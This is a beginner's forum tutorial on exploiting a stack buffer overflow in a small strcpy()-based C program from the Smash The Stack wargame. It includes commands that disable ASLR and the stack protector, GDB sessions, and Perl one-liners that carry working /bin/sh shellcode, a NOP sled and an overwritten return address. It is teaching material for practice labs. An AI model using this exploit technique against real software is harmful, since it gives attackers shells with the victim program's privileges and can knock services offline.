Buffer Overflow Exploitation for Beginners

Prerequisites: 

Basic/Intermediate knowledge of Assembly Language
Basic/Intermediate knowledge of GDB (the GNU Debugger), which is the debugger I will be using for this tutorial
A good understanding of the C/C++ Languages
A good understanding of how the stack is ordered and processed in a computer

So, a while back (about 4 months ago at this point), I wrote an article on Reddit regarding the exploitation of Buffer Overflows. I neglected to post it to the site because I was extremely tired, and then it was forgotten. After various jabs from Shinobi on IRC, I am (finally) going to post it, so here goes:

Introduction:

A Buffer Overflow is a vulnerability which occurs when a program writing data to a buffer exceeds the bounds of that buffer, causing the excess data to overflow into adjacent memory.

Picture this: we have created a C program in which we have declared a variable, buffer, as an array of char with a size of 500 bytes:

int main(void) {

    char buffer[500];

}

And in this program, we take input from the command line, which is then copied to a buffer, via the C function strcpy().

#include <string.h>

int main(int argc, char *argv[]) {

    char buffer[500];

    strcpy(buffer, argv[1]);

}

Notice that we have not checked whether or not the length of argv[1] is within the buffer's range of 500 bytes. Why not? Well, you'd think that, as in most modern programming languages, the strcpy() function would check this before copying the data to the buffer. This is not the case: strcpy() keeps copying until it reaches the terminating null byte of the source string, however long that is. Assuming otherwise is a common misconception among novice programmers who are not aware of the security implications of certain functions, which is why this vulnerability exists and may continue to exist well into the future.

Now, you may be wondering how you could possibly exploit such a vulnerability. I mean, what good is writing a few bytes into memory? Well, on its own, nothing, but if you were to overwrite the return pointer of the function you are in, you could ultimately alter the flow of code execution within the program that you are targeting. For example, in the program above, say that theoretically the memory of buffer starts at 0x00000000 and ends at 0x000001F3 (which gives it 500 bytes of space), and that the return pointer is located 524 bytes beyond that. It would then take an input of 1024 bytes, e.g. 1024 "A"s, to reach the return pointer. You can then overwrite the next 4 bytes of memory, which hold the return pointer, and watch as it is popped into the EIP register when the function returns, executing whatever code, malicious or otherwise, lies at the address you specify.

Exploiting the Buffer Overflow vulnerability:

Now we get on to the really fun bit, where we actually get to exploit a program which is susceptible to this exploit vector. If you are going to attempt this on your own computer, first make sure you are NOT using Windows Vista or later, as those versions have protections in place such as Executable Space Protection (called DEP on Windows), ASLR (Address Space Layout Randomization), and various other exploit prevention techniques. It is more advisable to use Linux or another Unix-based operating system, as it's easier to disable these countermeasures there, by running a command such as:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

This will disable your system's ASLR until you reboot, which is not an option in Windows operating systems (that I'm aware of).

If you do not have access to a Linux operating system, or are too lazy to dual boot or install a VM, you can SSH into various wargaming servers (such as Smash The Stack or Over The Wire) to practice the skills learned here in a legal and safe way, with minimal effort, for all you lazy h4xx0rs out there.

Now, on with thy spl0itz.

I'm going to use a simple source code from Smash The Stack : Blowfish, which does not currently have a webpage. Here is the code:

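#include <stdio.h>
#include <stdlib.h>  /* exit() */
#include <string.h>  /* strcpy() */

int main(int argc, char * argv[]) {

    char buf[256];

    if(argc == 1) {

        printf("Usage: %s input\n", argv[0]);
        exit(0);

    }

    strcpy(buf,argv[1]);  /* no length check: this is the vulnerability */
    printf("%s", buf);

}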

As you can see, it follows the same principles as the example code used previously in the tutorial, but with some extra validation to make sure that argv[1] is present.

So, let's compile this code and continue.

In this tutorial, I'm going to use GCC (the GNU Compiler Collection) to compile my code. I will compile using the following command:

gcc bof.c -g -fno-stack-protector -o bof

The -g flag includes the debugging symbols that GDB needs, and -fno-stack-protector disables GCC's stack protection on systems where GCC has been patched to enable it by default.

Once we have compiled our vulnerable code, we can open the executable, which I have called "bof", with GDB, for debugging, using the command:

gdb bof

Which should give you something similar to this:

Quote:

GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later http://gnu.org/licenses/gpl.html
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
(gdb)

Now that we are in GDB, we can start getting into the real exploitation; firstly, we want to make sure that we can run the executable correctly from GDB. We can do this simply by typing "run", which should return:

Quote:

Usage: /home/bof input

Program exited normally.

If it returns an error instead, then try moving to a folder where you have sufficient permissions.

Assuming that the program executes, then exits normally, we can carry on.

We now need to establish how many bytes we have to enter until we have control over the return pointer. There are two main ways to do this:

Trial and error

or

A string which never repeats a sequence of bytes, allowing for easy identification

I tend to just use trial and error, as the second option requires the Metasploit Framework, which may not be available on machines such as the ones you will encounter while wargaming.

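So, for trial and error, we want to type run, passing the output of a small Perl script as the argument:

run $(perl -e 'print "A" x 512')

For me, this causes a segmentation fault, which occurs when EIP is set to an address which cannot be executed, or which is outside of the memory available to the program (here most likely 0x41414141, since 0x41 is the ASCII code for "A").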

So, now that we know the return pointer resides within 512 bytes of the start of our buffer, we can start to slowly decrease the number of "A"s that we print until the program executes without error and returns "Program exited normally.". For me, this occurs at 268 bytes, which is only 12 bytes past the end of our 256-byte buffer. This means that the return pointer occupies the four bytes immediately after those 268 bytes (bytes 269 to 272 of our input).

Armed with this knowledge, we can move on to adding in our shellcode, which is made up of the opcodes (the raw machine-code bytes) of Assembly instructions. The shellcode I will be using for this tutorial is a /bin/sh shellcode written by a fairly recently retired member of SoldierX, jip, which will drop you into a shell with the permissions of the program you are attacking. Here it is:

\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

So, what do we do now? Well, we have to incorporate this into our exploit. We do this by first adding the shellcode to the Perl string, giving us this command:

run $(perl -e 'print "A" x 268 . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')

Then we must subtract the number of bytes the shellcode contains from the overall number of "A"s (or whatever filler you are using), so that we still retain control over the return pointer. In order to do this, we replace the number "268" with "(268 - 26)", where 26 is the number of bytes in the shellcode (each "\xNN" escape stands for a single byte, written as two hexadecimal digits). This gives us this command:

run $(perl -e 'print "A" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')

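This Perl command on its own will not actually give us a working exploit; for that, we need to find out the address at which our shellcode is stored. But before we get into the nitty gritty with Assembly Language, I want to make 2 more adjustments to our current exploit:

A NOP sled: replacing the "A" filler with NOP instructions (\x90), so that execution can land anywhere in the filler and slide down into the shellcode
An address "placeholder": the longer or shorter the exploit string is, the more the memory layout shifts around, so we put four dummy bytes where the real address will go. This fixes the total length now, so the addresses we find will still be valid once we swap in the real address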

The altered code will look like this:

run $(perl -e 'print "\x90" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\xff\xff\xff\xff"')

Now we've got an almost working exploit. All we have to do is find that memory address. To do that, we run "disas main", which will give us the following result:

Quote:

Dump of assembler code for function main:
0x080483f4 <main+0>: push %ebp
0x080483f5 <main+1>: mov %esp,%ebp
0x080483f7 <main+3>: sub $0x118,%esp
0x080483fd <main+9>: and $0xfffffff0,%esp
0x08048400 <main+12>: mov $0x0,%eax
0x08048405 <main+17>: sub %eax,%esp
0x08048407 <main+19>: cmpl $0x1,0x8(%ebp)
0x0804840b <main+23>: jne 0x804842e <main+58>
0x0804840d <main+25>: mov 0xc(%ebp),%eax
0x08048410 <main+28>: mov (%eax),%eax
0x08048412 <main+30>: mov %eax,0x4(%esp)
0x08048416 <main+34>: movl $0x8048574,(%esp)
0x0804841d <main+41>: call 0x80482f8 <printf@plt>
0x08048422 <main+46>: movl $0x0,(%esp)
0x08048429 <main+53>: call 0x8048308 <exit@plt>
0x0804842e <main+58>: mov 0xc(%ebp),%eax
0x08048431 <main+61>: add $0x4,%eax
0x08048434 <main+64>: mov (%eax),%eax
0x08048436 <main+66>: mov %eax,0x4(%esp)
0x0804843a <main+70>: lea -0x108(%ebp),%eax
0x08048440 <main+76>: mov %eax,(%esp)
0x08048443 <main+79>: call 0x8048318 <strcpy@plt>
0x08048448 <main+84>: lea -0x108(%ebp),%eax
0x0804844e <main+90>: mov %eax,0x4(%esp)
0x08048452 <main+94>: movl $0x8048585,(%esp)
0x08048459 <main+101>: call 0x80482f8 <printf@plt>
0x0804845e <main+106>: leave
0x0804845f <main+107>: ret
End of assembler dump.

This is where you will need to have some knowledge of Assembly to get through.

As you can see, we have a full dump of the program's Assembly code; so, what do we do with it? Well, first, we have to look for the call to strcpy(), which should be pretty easy, as GDB labels it "strcpy@plt"; in the dump above it is the call to 0x8048318 at address 0x08048443. Once we know where strcpy() is called, we can set a breakpoint to pause just before it is called, and examine the stack. To do this, run the command "break *main+79".

Run the program again, and we should get something like:

Quote:

Breakpoint 1, 0x08048443 in main ()
(gdb)

which signifies that the program is waiting at the specified breakpoint.

We now want to examine the top two pointers on the stack, which are the arguments which will be passed to the strcpy() function. To do this we type "x/2x $esp", which will give us:

Quote:

0xbfffd6c0: 0xbfffd6d0 0xbfffd974

The two addresses after the colon are the addresses that we are interested in. To view what data they hold, we have to type "x/s 0xbfffd6d0", which will give us:

Quote:

0xbfffd6d0: "\210"

Which is clearly not our shellcode, so this must be the buffer before we have written to it. So, if we type "x/s 0xbfffd974", we should see our shellcode.

Quote:

0xbfffd974: '\220' <repeats 200 times>...

Hmm.. Well that's odd.. No shellcode, only NOPs ('\220' is GDB's octal notation for the byte 0x90). Oh yeah, it's further down, past the NOPs. Press enter once and we should see it.

Quote:

0xbfffda3c: '\220' <repeats 43 times>, "1ÀPhn/shh//bi\211ãP\211âS\211á°\vÍ\200ÿÿÿÿ"

That's it! We know where our shellcode is stored, so now we can take the address "0xbfffd974" (the start of the NOP sled that leads into it) and substitute it right into the exploit.. right? Nope, we must swap the byte order around, because x86 is a Little Endian architecture: multi-byte values such as addresses are stored in memory with the least significant byte first. So, we reverse the bytes to give us "74 d9 ff bf", which then need to have "\x" prepended, as they are hex bytes, giving us "\x74\xd9\xff\xbf". This can now be substituted into our exploit to give us the command:

run $(perl -e 'print "\x90" x (268 - 26) . "\x90\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" . "\x74\xd9\xff\xbf"')

Running this command should give us a shell. (Note that sometimes GDB does not have the permissions required, so you should run the exploit outside GDB, by typing "quit", then replacing "run" with the path to the binary, e.g. "./bof".)

Quote:

sh-3.2$

WE DID IT!

From now on, you will have a shell running with the permissions of the exploited application (until you choose to quit)! Once you do quit, however, the program will crash, which will most likely cause a Denial of Service in programs such as web servers, which are responsible for serving data to clients.

I'm not going to cover how to alter the flow of execution so that the program continues to function correctly, as this is meant to be a tutorial explaining the basics of the buffer overflow: how the concept works and how it is exploited. So, that is the end of my Buffer Overflow Exploitation tutorial. I hope that you learned how to exploit buffer overflows quickly and easily (if not, feel free to pm me with any questions or problems and I'll make sure to get back to you). Thanks a lot,

xAMNESIAx